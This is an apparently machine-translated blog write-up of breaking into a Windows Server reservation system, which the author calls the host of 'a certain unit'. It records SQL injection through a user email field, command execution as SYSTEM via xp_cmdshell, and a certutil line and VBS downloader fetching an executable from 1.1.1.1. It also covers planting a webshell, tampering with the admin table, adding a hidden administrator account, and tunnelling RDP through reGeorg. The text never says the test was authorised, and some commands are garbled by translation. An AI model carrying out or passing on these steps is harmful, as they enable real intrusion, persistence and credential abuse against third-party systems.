Shulou(Shulou.com)06/01 Report--

How to carry out simple Win Server infiltration, in view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

0x00

Once infiltrating a host system of a certain unit, the sensitive information has been coded.

Target environment Windows Server 2008 R2 + IIS7.5 + ASP.NET2.0.50727

0x01

The system is a reservation system. After port scanning, it is found that many ports are open, among which the noteworthy ports 135445, 3389 are filtered by the firewall and port 1433 is open. Blasting 1433 sa passwords is often very difficult, so leave it for the time being.

0x02

When testing the function point manually, fuzz found that almost all SELECT SQL parameter points cannot be injected, so you can guess that a unified query method (parameterization or ORM) is used in the background, so there is no need to try SELECT parameters. Instead, you can focus on UPDATE or INSERT, and there may be a turnaround.

Sure enough, after the test, it was found that there was a blind time-based injection in the modification of the user's mailbox.

There is a front-end verification for the mailbox format, which can be simply bypassed.

After checking the source code after getshell, it is also confirmed that the UPDATE statement does not do a parameterized query.

0x03

SQLMap a shuttle, first test whether you have DBA permission

Very lucky.

Try to use the xp_cmdshell component to execute the command directly. Here, because it is a sa user, the corresponding system permissions are often very high. Here is the SYSTEM permission directly.

0x04

Want to continue to explore useful information, but found a problem, through time blind injection to get command echo is very slow, a dir instruction echo almost needs 5-10min, so you need to consider getting a WebShell or Meterpreter

WebShell is shelved for the time being because it does not know the absolute path and is difficult to obtain echo.

The attempt to download remote control, certuril, vbs from VPS failed without exception.

/ / certutilcertutil-urlcache-split "http://1.1.1.1/1.exe"

/ / vbsecho set a=createobject (^ "adod^" + ^ "b.stream^"): set w=createobject (^ "micro^" + ^ "soft.xmlhttp ^"): w.open ^ "get^", wsh.arguments (0), 0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments (1), 2 > > d.vbs

Cscript d.vbs http://1.1.1.1/1.exe C:Windowstemp1.exe

Next you need to determine whether it is due to a failed download or a successful download but was killed, and try to download a plain text file-successful.

Then the attempt to directly execute the ps1 generated by CS also failed, and the guess is that the killing software of the server has carried on the second confirmation of the dynamic behavior.

0x05

Calm down and think about it. Next, you can try to write WebShell; or find the configuration file of SQL SERVER, directly through the open port 1433 connection on the public network, and then xp_cmdshell executes the command (the echo of this is much faster than time blind injection, of course), but you still have to find the WEB directory to find the configuration file. It may take one day to go through the catalog through the existing time blind, so I need to know the absolute path through as few echoes as possible.

Determine all drive letters of the target system first through wmic

Wmic logicaldisk where DriveType=3 get DeviceID

Then use some feature file names in the web path to find the wildcard.

For / r C:% I in (dir1dir2special_name.asp*) do @ echo% I

For / r C:% I in (dir1dir2special_name.asp*) do @ echo% I

Here, because the echo takes time, it will not be repeated in os-shell. It is demonstrated through AntSword.

Seven paths are echoed here, try echo 1 > xxxx1.txt one by one, and finally determine that the WEB directory is a directory under E:Program files (x86).

Write happily to WebShell

Connect

0x06

WebShell is just an iis permission, so flip through the configuration file

This echo is much more convenient.

0x07

At the beginning, the administrator logged in to the background to query the administrator's password and found that the password was an encrypted string of 80 bytes.

The encryption function of the source code was not found (only binary does not have .cs in part of the source code). If master knows what encryption is, you are welcome to communicate.

Finally, I thought, um, just insert the encrypted password of my ordinary user into the admin table.

Successfully log in to the backend

0x08

Remember that the target opened 3389 and tried to connect.

Add users through the SYSTEM permissions of xp_cmdshell

Net user iv4n$ xxxxxxx / add

Net localgroup administrators iv4n$ / add

But the firewall restricts 3389 of the access to the public network. Try to forward it through the socks proxy.

(considering that EXE needs to be free from killing, it was intended to use the port of the system netsh component to forward, but the forwarding exception occurred during the connection, and then use reGeorge to access the target private network port)

All seems fine, it's okay to test it.

Edit the configuration of proxychains as the socks4 proxy of local port 4444, and connect through proxychains socket rdesktop

0x09

The target system does not have a domain environment, so testing ends here.

This is the end of the answer to the simple Win Server infiltration question. I hope the above content can be of some help to you. If you still have a lot of doubts to solve, you can follow the industry information channel to learn more about it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.